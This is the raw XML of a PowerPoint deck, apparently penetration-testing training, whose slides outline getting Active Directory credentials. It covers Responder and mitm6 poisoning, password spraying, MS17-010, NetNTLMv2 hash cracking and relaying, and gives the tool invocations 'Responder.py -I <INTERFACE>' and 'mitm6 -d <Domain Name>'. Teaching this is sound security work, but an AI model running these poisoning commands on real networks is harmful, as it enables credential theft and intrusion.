            <a:ext cx="5186840" cy="91994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PLAINTEXT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NTLM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NETNTLMv2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FEE6F4-9FF2-6BB2-40E0-B6383D758297}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="734049" y="3364359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DOMAIN / LOCAL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BE049-03FF-FBF5-2E6F-9F14DEC1B1A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="727520" y="4010003"/>
            <a:ext cx="5186840" cy="38472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PASSABLE / NOT PASSABLE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3B344-A808-E601-04B2-61C051D7DFF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="727520" y="4798635"/>
            <a:ext cx="5186840" cy="3847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MANY</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" spc="100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1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 WAYS TO GET THEM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CE1D9-4161-9994-68A2-870C84A7E02B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="5065160" cy="11390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36C59-DFEB-164C-ACD4-C1F01759FF86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1540962" y="277127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STEP 1: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CDE4B-82FB-C5CC-19E4-2ED79A9C8142}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7126842" y="277127"/>
            <a:ext cx="3025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Good Times Rg" panose="020B0605020000020001" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>GET CREDS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70B93-1334-AB33-3C58-6EE3F556E1E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="727520" y="5475259"/>
            <a:ext cx="5186840" cy="1105614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Responder/MITM6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PASSWORD SPRAY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MS17-010</a:t>
            </a:r>
          </a:p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HARDCODED CREDENTIALS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9C78B0-83C8-BD01-44DD-443DF9CB0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1B35AC-DFC8-0463-B83F-D2B17C118F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5" r="1101" b="1918"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1229217"/>
            <a:ext cx="5624186" cy="2478488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F99427-D2A8-630C-5DF0-54668A65AD57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6230723" y="1603332"/>
            <a:ext cx="5199898" cy="3651336"/>
            <a:chOff x="734049" y="1966755"/>
            <a:chExt cx="5199898" cy="27200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ADA95-ED2F-C746-DD9D-895A8FFEA7D2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="734049" y="1966755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POISONS NAME RESOLUTION MESSAGE TRAFFIC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0A0D6-0110-6F83-7865-BD2C8C6BC795}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="740578" y="2612400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CAN RESULT IN NETNTLMV2 HASHES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EE6F4-9FF2-6BB2-40E0-B6383D758297}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="747107" y="3057325"/>
              <a:ext cx="5186840" cy="2856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NOT PASSABLE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3BE049-03FF-FBF5-2E6F-9F14DEC1B1A2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="747107" y="4302059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VERY COMMON BUT DEPENDENT ON PLACEMENT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23287-F78C-8D89-B3C9-7B0D6702DAC1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6238096" y="0"/>
            <a:ext cx="5953904" cy="1139031"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="5065160" cy="1139031"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="FFC00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CE1D9-4161-9994-68A2-870C84A7E02B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="5065160" cy="1139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736C59-DFEB-164C-ACD4-C1F01759FF86}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="207552" y="253467"/>
              <a:ext cx="467922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spc="100" dirty="0">
                  <a:latin typeface="Good Times Rg" panose="020B0605020000020001" pitchFamily="34" charset="77"/>
                  <a:ea typeface="Dela Gothic One" panose="00000500000000000000" pitchFamily="2" charset="-128"/>
                </a:rPr>
                <a:t>RESPONDER/MITM6</a:t>
              </a:r>
              <a:endParaRPr lang="en-ID" sz="3200" spc="100" dirty="0">
                <a:latin typeface="Good Times Rg" panose="020B0605020000020001" pitchFamily="34" charset="77"/>
                <a:ea typeface="Dela Gothic One" panose="00000500000000000000" pitchFamily="2" charset="-128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581D8-2D4F-69D8-3234-F0F4E8870200}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6243781" y="3519185"/>
            <a:ext cx="5186840" cy="38348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OFFLINE CRACKING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16775F-B9E8-4B89-2748-4A847C8E1577}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6243781" y="3968549"/>
            <a:ext cx="5186840" cy="38348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RELAYING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EC59843-1DB3-D89B-9F8D-F8C47A3F7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1D24EB-7410-D378-A2A7-82B5E44E7AAD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="822788" y="6054177"/>
            <a:ext cx="3906839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Responder.py -I &lt;INTERFACE&gt;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6E254F-E7FD-EFCE-8014-0851326F5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81069"/>
            <a:ext cx="5624186" cy="17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2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DC37A-71FA-874F-31B8-6E4308828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BC9FCD-E49A-8BDC-CA9B-6F2C5C87F76A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6230723" y="1603331"/>
            <a:ext cx="5199898" cy="4104741"/>
            <a:chOff x="734049" y="1966755"/>
            <a:chExt cx="5199898" cy="27200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9DA75-502D-808F-130B-034ECAA32E3D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="734049" y="1966755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POISONS DHCPv6 CONFIGURATION REQUESTS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992EAA-53AA-BB28-1E04-2D6FE136ABE3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="740578" y="2612400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Positions Attacker As Preferred DNS Server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639C27-691B-00DA-B2C6-42EBB9DD27BF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="747107" y="3057325"/>
              <a:ext cx="5186840" cy="28567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rgbClr val="FFC000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Windows Hosts Prefer IPv6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C391D1-A7FF-6745-81E0-85D7D71891F1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="747107" y="4302059"/>
              <a:ext cx="5186840" cy="3847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spc="100" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Good Times Rg" panose="020B0605020000020001" pitchFamily="34" charset="77"/>
                  <a:ea typeface="Dela Gothic One" panose="00000500000000000000" pitchFamily="2" charset="-128"/>
                </a:rPr>
                <a:t>Very Common - MS Suggested Fix doesn’t Fix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9F2D1A0-ACEA-2318-7B3F-34FA904DFD24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6230723" y="3771046"/>
            <a:ext cx="5186840" cy="476378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Can Poison Configuration Requests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A2FDD4-A129-3E86-CCE8-E5039717C79F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6230723" y="4347257"/>
            <a:ext cx="5186840" cy="580574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100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Good Times Rg" panose="020B0605020000020001" pitchFamily="34" charset="77"/>
                <a:ea typeface="Dela Gothic One" panose="00000500000000000000" pitchFamily="2" charset="-128"/>
              </a:rPr>
              <a:t>Can Result in NetNTLMv2 Hashes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9BF5A7A-E774-647D-DBDD-246990146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33" t="34256" r="-5533" b="45763"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7462374" y="5856093"/>
            <a:ext cx="4729626" cy="765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473409-0FE8-0C17-BEF3-A76EFE725D00}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="822788" y="6054177"/>
            <a:ext cx="3217547" cy="369332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Mitm6 -d &lt;Domain Name&gt;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7E1393-DD79-5450-2EDB-4BD17F9F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603331"/>
            <a:ext cx="6019800" cy="3403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E6D10C-2471-5DC3-E108-4845EA7B5DF4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6243781" y="0"/>
            <a:ext cx="5953904" cy="11390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A427E-E2AC-9B72-97D3-1DD3CED566C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6428508" y="253467"/>
            <a:ext cx="55002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pc="100" dirty="0">
                <a:latin typeface="Good Times Rg" panose="020B0605020000020001" pitchFamily="34" charset="77"/>
                <a:ea typeface="Dela Gothic One" panose="00000500000000000000" pitchFamily="2" charset="-128"/>
              </a:rPr>
              <a:t>RESPONDER/MITM6</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="3200" spc="100" dirty="0">
              <a:latin typeface="Good Times Rg" panose="020B0605020000020001" pitchFamily="34" charset="77"/>
              <a:ea typeface="Dela Gothic One" panose="000005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528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6fbd-b4ae-4299-a1bb-8cfedc6b0392">
      <Terms xmlns="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    </lcf76f155ced4ddcb4097134ff3c332f>
    <TaxCatchAll xmlns="89273e75-b753-4945-a62d-3c1bacae302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7588265262441AADE632F08AA5E0F" ma:contentTypeVersion="18" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="cf021d1b321855c93bbe8e6982cf683a">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="37026fbd-b4ae-4299-a1bb-8cfedc6b0392" xmlns:ns3="89273e75-b753-4945-a62d-3c1bacae302d" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="3ea802b119777f90a98946cd724c43fb" ns2:_="" ns3:_="">
    <xsd:import namespace="37026fbd-b4ae-4299-a1bb-8cfedc6b0392"/>
    <xsd:import namespace="89273e75-b753-4945-a62d-3c1bacae30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6fbd-b4ae-4299-a1bb-8cfedc6b0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734b2d-87aa-47be-a7f7-84ad505ba9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273e75-b753-4945-a62d-3c1bacae302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1e6cae-e6c5-45df-b0d4-be5e52729324}" ma:internalName="TaxCatchAll" ma:showField="CatchAllData" ma:web="89273e75-b753-4945-a62d-3c1bacae30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0CD3D-9011-4437-AE0F-DA7CCC72C6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30C831-60D1-4E25-94F4-1DDA60052281}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    <ds:schemaRef ds:uri="37026fbd-b4ae-4299-a1bb-8cfedc6b0392"/>
    <ds:schemaRef ds:uri="89273e75-b753-4945-a62d-3c1bacae302d"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{9B69C601-9954-41C9-AAD2-C090959A6C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6fbd-b4ae-4299-a1bb-8cfedc6b0392"/>
    <ds:schemaRef ds:uri="89273e75-b753-4945-a62d-3c1bacae30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6139</TotalTime>
  <Words>1673</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>329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Courier New</vt:lpstr>
      <vt:lpstr>Good Times Rg</vt:lpstr>
      <vt:lpstr>Mohave</vt:lpstr>
      <vt:lpstr>Raleway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DEWA</dc:creator>
  <cp:lastModifiedBy>Matt Fisher</cp:lastModifiedBy>
  <cp:revision>158</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-01-04T08:56:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-06-03T16:06:04Z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0x0101007D37588265262441AADE632F08AA5E0F</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="MediaServiceImageTags">
    <vt:lpwstr/>
  </property>
</Properties>
</file>